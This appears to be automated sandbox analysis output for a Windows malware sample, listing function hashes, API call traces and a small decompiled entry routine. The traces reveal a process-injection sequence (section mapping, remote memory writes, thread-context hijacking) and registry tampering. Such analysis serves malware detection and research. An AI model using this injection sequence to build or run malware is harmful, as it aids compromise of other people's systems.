Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 032901.exe Analysis ID: 66739

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	F3C6625D8EDE3FE6C8C4023337D761AC
Total matches:	32
Initial Analysis Report:	Open
Initial sample Analysis ID:	66739
Initial sample SHA 256:	A93182CDCDE8030CAC64378DA0406C7F628486EC1CF41B6E49CF5A551C0AB837
Initial sample name:	03290.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Similarity

Total matches: 33
API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
String ID: pnls$}nls
API String ID: 315724681-4252118926
Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
CloseHandle.KERNEL32(?), ref: 002E43F8
StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
FindNextFileA.KERNELBASE(?,?), ref: 002E4486
StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
FindNextFileA.KERNELBASE(?,?), ref: 002E4542
CompareFileTime.KERNEL32(?,?), ref: 002E456B
HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1

Strings

pnls, xrefs: 002E4340, 002E4351, 002E4367, 002E4373, 002E438B, 002E4393
}nls, xrefs: 002E436C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Similarity

Total matches: 38
API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
String ID: pnls
API String ID: 82859500-141991303
Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714

APIs

Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F

memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F

Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04

memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F

Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4

Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
CloseHandle.KERNEL32(00000000), ref: 002E1EE0
memset.NTDLL ref: 002E1EF4

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

Strings

pnls, xrefs: 002E1D8C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

